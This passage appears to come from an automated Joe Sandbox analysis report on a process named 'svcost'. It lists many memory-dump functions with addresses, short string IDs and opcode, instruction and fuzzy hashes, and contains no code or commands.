                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3242c2284624549374826f900066cf4441e2cbd195758f85c8e42e0038958846
                                                                                                • Instruction ID: b528ac9620623baed08cf3b243b7f77e148b5af5db88d45385b2d83cfd82ec8f
                                                                                                • Opcode Fuzzy Hash: 3242c2284624549374826f900066cf4441e2cbd195758f85c8e42e0038958846
                                                                                                • Instruction Fuzzy Hash: AD311374E14209CFDB04DFAAD980AAEBBFAFB89310F10D069E415A7354E730AA518F51
                                                                                                Function 04326554 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 10a6c44423c336bdbeb931a3b2e4454df0808b40abadebbb4c12dbae98cb7110
                                                                                                • Instruction ID: a29185c63ccc08d767313e4ad28c76c031521165cb30ddc236a0353e63fc0095
                                                                                                • Opcode Fuzzy Hash: 10a6c44423c336bdbeb931a3b2e4454df0808b40abadebbb4c12dbae98cb7110
                                                                                                • Instruction Fuzzy Hash: 16313E70A09228CFEB20DF69DA857ADBBF5FF4D314F20A1A9D409A3655D7746980CF40
                                                                                                Function 00C24568 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: acf6324b1e115e1adffe350c0476132500a16f4e3cf8124249e3c1d2602fdbaf
                                                                                                • Instruction ID: ef0165cd3c4dc56a120a51565934f40fafbb47ce25629a30da6432dddca92168
                                                                                                • Opcode Fuzzy Hash: acf6324b1e115e1adffe350c0476132500a16f4e3cf8124249e3c1d2602fdbaf
                                                                                                • Instruction Fuzzy Hash: AE313874D05228CFDB28DF26D854BADBBBAFB89300F1081EAE449A3655DB704A85DF00
                                                                                                Function 00C2D013 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 6a225fb47ee71b0da85b935ba0406baacf4de5e9c5674bf42ba13c051c02c7a5
                                                                                                • Instruction ID: f3336dab50ab092af7fa549de262b586fb7a94b00ab3672a359e94cf718b0b4b
                                                                                                • Opcode Fuzzy Hash: 6a225fb47ee71b0da85b935ba0406baacf4de5e9c5674bf42ba13c051c02c7a5
                                                                                                • Instruction Fuzzy Hash: 5D41F174D05268CFDB20CF69D984BDEBBF1AF49310F2081AAD409AB661D7B45A85DF00
                                                                                                Function 0031C930 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 41e516ed150c5f712d9879366ca3eef106e72f50764be96bc6fb2c6cc22c08d4
                                                                                                • Instruction ID: a1203c744f8c4a59ddf09e7b32359b49dadd6f37aa1ea0c2b8e46b27835deb5c
                                                                                                • Opcode Fuzzy Hash: 41e516ed150c5f712d9879366ca3eef106e72f50764be96bc6fb2c6cc22c08d4
                                                                                                • Instruction Fuzzy Hash: 13214675E552098BDB09DFAAC8447EEBBFAEB8E300F10942AD415B3390DB744981CF91
                                                                                                Function 00C2D3F8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ILuV
                                                                                                • API String ID: 0-1855505789
                                                                                                • Opcode ID: eb053716dbecb7584cde8810a664bdd26a19d4fbad3588fd4ca78d7d460d5545
                                                                                                • Instruction ID: 8683422bc852c794369ba090143d74d5ee2d4b2f385965ab16c06265990c42f8
                                                                                                • Opcode Fuzzy Hash: eb053716dbecb7584cde8810a664bdd26a19d4fbad3588fd4ca78d7d460d5545
                                                                                                • Instruction Fuzzy Hash: 54219C74E04249CFDB04EF6AE884AAEBBF1FF99300F208465D406A7355D730AA42CF51
                                                                                                Function 003188C8 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 623093819f0da2c6560fb3e37163dc38f7353f16eb78c4516092ed260a55c339
                                                                                                • Instruction ID: a7a779c49a3ea4dd99d6016c5aae82115622f6fb3495ea65cfb2755bcade6f05
                                                                                                • Opcode Fuzzy Hash: 623093819f0da2c6560fb3e37163dc38f7353f16eb78c4516092ed260a55c339
                                                                                                • Instruction Fuzzy Hash: E4314D70D09208DFD705DFA8D488BEEBBF9EB4D300F1180AAE005A7650DB744A85CF16
                                                                                                Function 00C269D9 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 7e1956ce88091fd0e5e365e577b36b131097f6e51616b0e7153ce4773bb0d7fd
                                                                                                • Instruction ID: 9dec9b606ccc76a3bf5ef7cbb7b067fff8922409487e94b0b7872744c83164b2
                                                                                                • Opcode Fuzzy Hash: 7e1956ce88091fd0e5e365e577b36b131097f6e51616b0e7153ce4773bb0d7fd
                                                                                                • Instruction Fuzzy Hash: ED411878A112288FCB64EF24D881B9EB7B6FB89310F1081E9D44DA7759CB305E91CF51
                                                                                                Function 00C2D408 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ILuV
                                                                                                • API String ID: 0-1855505789
                                                                                                • Opcode ID: bc1362e19622089072b865130cff67ceabee6b03c1f0746cfe462af8ab7f320d
                                                                                                • Instruction ID: 4e80bece6245aca3c55ff0b71a71b200e27f0dca8d1de00ec792d3635dae59b0
                                                                                                • Opcode Fuzzy Hash: bc1362e19622089072b865130cff67ceabee6b03c1f0746cfe462af8ab7f320d
                                                                                                • Instruction Fuzzy Hash: 9D218E74E04219CFDB04EF6AE880AAEB7F5FB88310F20C465D41AA7354D730AA41CF51
                                                                                                Function 00C28471 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1c831e80bc42221ef38c48ae29bfa428a145c6d3fa8b8b98743005485cbd4d32
                                                                                                • Instruction ID: f51320538e2c20cbad6d105bcbe5f81177ead540e3f02c8ed5470e6f0777deb3
                                                                                                • Opcode Fuzzy Hash: 1c831e80bc42221ef38c48ae29bfa428a145c6d3fa8b8b98743005485cbd4d32
                                                                                                • Instruction Fuzzy Hash: 18219C30D0921A8FCB00DFA9E864BEEBBF5FF89300F10846AD105A3695CB785A49CF51
                                                                                                Function 00C45618 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: a2e1d20eef9dff5949f4d2a7a0ab6411f0cf2467d239707a6152e84bbac2f5e9
                                                                                                • Instruction ID: a600d5e1ad017de489866ee9d8dcb7d557b08eeab83c0a06142a4d7a5d28ae2c
                                                                                                • Opcode Fuzzy Hash: a2e1d20eef9dff5949f4d2a7a0ab6411f0cf2467d239707a6152e84bbac2f5e9
                                                                                                • Instruction Fuzzy Hash: 39212070E09609CFDB04CFAAE8487EEBBB5FB89310F51802AE019B2355D7744A45CFA1
                                                                                                Function 00C28480 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: eebc090cb56f5bb1bfb72ee7957c21ec952da515c80bec480b9ece09245c1cd6
                                                                                                • Instruction ID: 011fd411c44605fb0ceb72ee40fde001f090344f8e6572102a0989b7eafc57b5
                                                                                                • Opcode Fuzzy Hash: eebc090cb56f5bb1bfb72ee7957c21ec952da515c80bec480b9ece09245c1cd6
                                                                                                • Instruction Fuzzy Hash: 54216D70D05219CFDB00DF99E854BEEB7F5FB89300F108469E115A3795CB785A498F51
                                                                                                Function 00C2CD1D Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3c52b1e622f216e0e94f7efa44d3e209d202c1d89edfee2197e0aa6fbd89db19
                                                                                                • Instruction ID: a483ce0b49bf5e38bc3d517968b78e5d854d9afdca55621f3fa4f4b4a7ea98d4
                                                                                                • Opcode Fuzzy Hash: 3c52b1e622f216e0e94f7efa44d3e209d202c1d89edfee2197e0aa6fbd89db19
                                                                                                • Instruction Fuzzy Hash: 1D31167490536CCFDB20CFA8D984BEDBBF1AB08314F10809AD409AB691D7B54A85EF10
                                                                                                Function 0432B900 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p
                                                                                                • API String ID: 0-1059414960
                                                                                                • Opcode ID: b93abefde98fda58d0474cb9111f2ee191d3afd4278bd8803f609c73914a9ebe
                                                                                                • Instruction ID: fbd857079a2c1e870ebda647942f8a05cdf973ea051c087713b1bfa401dbb9b9
                                                                                                • Opcode Fuzzy Hash: b93abefde98fda58d0474cb9111f2ee191d3afd4278bd8803f609c73914a9ebe
                                                                                                • Instruction Fuzzy Hash: DC11BE347002159FCB04DF68C991A6EBBB1EF89301B1581A6E905DB3A2DB30FC41CBA1
                                                                                                Function 05403967 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 7de914651f5c32d7c55922f224ee9f302b3c73413683326bffb9763d8c6093fe
                                                                                                • Instruction ID: afda258d6d282be8b96600b982632a97f00f8ea6685538a03a12d1f7f0d5c3e6
                                                                                                • Opcode Fuzzy Hash: 7de914651f5c32d7c55922f224ee9f302b3c73413683326bffb9763d8c6093fe
                                                                                                • Instruction Fuzzy Hash: DA21AD74A41229CFEB24CF18D988BDABBB1BF48304F9055EAE80DA7740D7709A848F05
                                                                                                Function 00310910 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: hB+
                                                                                                • API String ID: 0-3614873421
                                                                                                • Opcode ID: 358ee7ea17ae405883da194e3975d2101685d1aa76e4c56405d8b41c3597c6a6
                                                                                                • Instruction ID: a867fa45f26490b901348bad524ce8a0e8a908faa813720b7e57185e5f7c53a1
                                                                                                • Opcode Fuzzy Hash: 358ee7ea17ae405883da194e3975d2101685d1aa76e4c56405d8b41c3597c6a6
                                                                                                • Instruction Fuzzy Hash: 4201DF72D1020A8BDB04DBF5D8404EEBB32EFCA321F254725D5057B190EBB0219ECBA0
                                                                                                Function 04326DDF Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: f1ee3d774f533155feff3dd26e60616110cbc3562e3c9312af3eb4be9c3eff2d
                                                                                                • Instruction ID: 839cd616e5c0ba4096eee3fcdd93f16041f87645488126ab6aaf0de5193922df
                                                                                                • Opcode Fuzzy Hash: f1ee3d774f533155feff3dd26e60616110cbc3562e3c9312af3eb4be9c3eff2d
                                                                                                • Instruction Fuzzy Hash: 08111334A14658CFCB51DF64C88879DBBB1EB89321F1081EA940ABB794DA304E858F10
                                                                                                Function 00C46E8E Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: H
                                                                                                • API String ID: 0-2852464175
                                                                                                • Opcode ID: 1b995c7bd68a69d74fc8b64fea05d4d3b63300144c5cfaa9171188ada2a1f50f
                                                                                                • Instruction ID: bdc8eb86c500156a708388ca10f71fc60ff29f904ecb371e6a009e05f93873e0
                                                                                                • Opcode Fuzzy Hash: 1b995c7bd68a69d74fc8b64fea05d4d3b63300144c5cfaa9171188ada2a1f50f
                                                                                                • Instruction Fuzzy Hash: 4D01E8B4C49219CBDF20CF65C888BEDBAB0BB1A355F6411AAC41977244C7B80AC4DF59
                                                                                                Function 00C2EA1D Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1d4eb3f625b7e31c626ee26b790b24d8b3ba15afeba3d3eb430db2f9109fcbb0
                                                                                                • Instruction ID: e3cb88a9f54a57a40c822a90446cc58c525bca1e170b4215df6de446c6824bc0
                                                                                                • Opcode Fuzzy Hash: 1d4eb3f625b7e31c626ee26b790b24d8b3ba15afeba3d3eb430db2f9109fcbb0
                                                                                                • Instruction Fuzzy Hash: 9E01C434A10629CBCB20EF69D890B99B7B1FF89310F50869AE549B3750DB70AAD5CF50
                                                                                                Function 0432669D Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: fb7b2465b70d5ab6ccd2ea4cfb54b1c86aac735970433091f3eb5e25680f716c
                                                                                                • Instruction ID: 3d2a54583a937c985773ec57871f5f301945e074e96a7df69f2eb653c9565832
                                                                                                • Opcode Fuzzy Hash: fb7b2465b70d5ab6ccd2ea4cfb54b1c86aac735970433091f3eb5e25680f716c
                                                                                                • Instruction Fuzzy Hash: B5017838A04228CFDB11DF24C890B9EB7B1EF8A310F1081EAA409B7394CB705E81CF51
                                                                                                Function 04326EAD Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: cc0cb3ce99b9f6d87f19370f6bef6ae14201c1451a3bc5975659108d4b913c41
                                                                                                • Instruction ID: 15bafe11be355b4c63a4a0733e1961207528bb83157816190a28a62a571a070a
                                                                                                • Opcode Fuzzy Hash: cc0cb3ce99b9f6d87f19370f6bef6ae14201c1451a3bc5975659108d4b913c41
                                                                                                • Instruction Fuzzy Hash: B601D274A112289FCB10DFA8D985B9EBBB1BF88310F10119AE409A7344CB71AD84CF00
                                                                                                Function 00C4C5C8 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3ea6ad7a2bdec816036a6c60707bcb9eb814206f929270731b0cdb53218acaed
                                                                                                • Instruction ID: 6d959d0fc8536b0fb9082a1d4fb519c7a76b9b08b492722fb4da6c1706acf317
                                                                                                • Opcode Fuzzy Hash: 3ea6ad7a2bdec816036a6c60707bcb9eb814206f929270731b0cdb53218acaed
                                                                                                • Instruction Fuzzy Hash: 14F0A73095E3888FCB42DBB9955469CBFB4EF47304F1051EED848A7252C6310959DB01
                                                                                                Function 00C2990F Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: d555f4e3856abaf1a67b76f091e78e1812ecdaad2c7abc7508409cb710e4b441
                                                                                                • Instruction ID: 66f8814f66c2b2a77f348fcb0d12b6f6ba1a0f52f13b75f9e84145b238a8c7eb
                                                                                                • Opcode Fuzzy Hash: d555f4e3856abaf1a67b76f091e78e1812ecdaad2c7abc7508409cb710e4b441
                                                                                                • Instruction Fuzzy Hash: 5FF03778E042088FCB55EFB5D09469DBFB1EF8A320F20419AD816A7356DB349989CF51
                                                                                                Function 00C2C564 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3ed31da3983002299945fd754aac52296338a00c976d573c62291ad8404a174f
                                                                                                • Instruction ID: b1d7f6275f283bee021e6a00869439edb436e0184a8e9b4eea0fb42c81a04982
                                                                                                • Opcode Fuzzy Hash: 3ed31da3983002299945fd754aac52296338a00c976d573c62291ad8404a174f
                                                                                                • Instruction Fuzzy Hash: 8301B2749152298FDBA1CF58DC80BEEBBF8AB08310F1041A5E45CA7A44DB759EC8DF50
                                                                                                Function 00C29A87 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: ed40c4c19ecfb3680730623c9c38cf5979882fd0a600a6d141bff9fa697c566a
                                                                                                • Instruction ID: 7ef185823513cfce19bdf15f072912ed7782f607d2c990c2540ee601144bb221
                                                                                                • Opcode Fuzzy Hash: ed40c4c19ecfb3680730623c9c38cf5979882fd0a600a6d141bff9fa697c566a
                                                                                                • Instruction Fuzzy Hash: 7DF0E274E042188FCB64EFA5D4947ADBBB1EF89310F20806DD419B3695DB385989CF45
                                                                                                Function 04326CBF Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1969d6baf144a75ff85465e65740d4c1a746b53b2cd63bed4d538f6872f4c800
                                                                                                • Instruction ID: 62fc77eef70d35811000b4626b894a13345c6f01a42e06203c293ffbb72305cf
                                                                                                • Opcode Fuzzy Hash: 1969d6baf144a75ff85465e65740d4c1a746b53b2cd63bed4d538f6872f4c800
                                                                                                • Instruction Fuzzy Hash: B1F04938914158DFCB24DF54DA95BADBBB1FF49320F2010A8E509A3750CB356D84CF00
                                                                                                Function 043266DB Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 21dbec5d3a7f31d332be0e674cf48f3534a9b61fdfd5f906745222fcfa048d28
                                                                                                • Instruction ID: fe102255105044b76e85181c676572df8d5766f766dd86f2fe33ca51c2e12123
                                                                                                • Opcode Fuzzy Hash: 21dbec5d3a7f31d332be0e674cf48f3534a9b61fdfd5f906745222fcfa048d28
                                                                                                • Instruction Fuzzy Hash: 63F01274E04218DFDB54DF68EA96B9CBBB1FB49320F205499E409A3690CB74AD85CF00
                                                                                                Function 0432679E Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 2aeeb70ad9e69c4ff05d5efc74912e8fe70d8c79b53760c14492475bc7b839ef
                                                                                                • Instruction ID: 3b057b0974211bf25c0d9355bf2be4bf53fdd163821824619f8749e63d8d007d
                                                                                                • Opcode Fuzzy Hash: 2aeeb70ad9e69c4ff05d5efc74912e8fe70d8c79b53760c14492475bc7b839ef
                                                                                                • Instruction Fuzzy Hash: D9F04974904118DFCB54DF54E89AB9CBBB1FF49320F2050A8E449A3741CB356D89CF00
                                                                                                Function 00C2CF9E Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: bdde0c14ab248c7e680749922bac307a83e95e0b7d4abd830e2d7c96e5b32d5b
                                                                                                • Instruction ID: 7775d1f90cfb2666c84fb8879ac18be231dbbc8fa1bdd56c4c3fb253319776e7
                                                                                                • Opcode Fuzzy Hash: bdde0c14ab248c7e680749922bac307a83e95e0b7d4abd830e2d7c96e5b32d5b
                                                                                                • Instruction Fuzzy Hash: 12F05830905228CFDB60CF58D9C4BCEB7B1EB08310F108099A448A77A1CBB44EC0DF00
                                                                                                Function 00C4C5D8 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
